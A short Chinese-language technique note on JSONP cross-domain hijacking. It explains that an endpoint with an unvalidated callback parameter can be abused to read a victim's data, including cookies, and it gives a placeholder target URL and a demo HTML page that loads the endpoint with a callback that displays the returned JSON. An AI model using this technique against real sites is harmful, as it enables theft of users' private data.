jsonp跨域劫持姿势

利用场景:
对于本域的某接口要回调外域的参数时,对回调的referer值无任何校验.方可利用.

例如:

http://xxx.xxxx.xxxx/index?callback=http://xxx.xxx.xxx&xxx=1

有callback参数未做校验,那么,可以用来做个jsonp跨域劫持Cookie.

Demo:

<html>
<script>
function test(json){
alert(JSON.stringify(json))
}
</script>
<script src="http://xxx.xxxx.xxxx/index?callback=test&xxx=1"></script>
</html>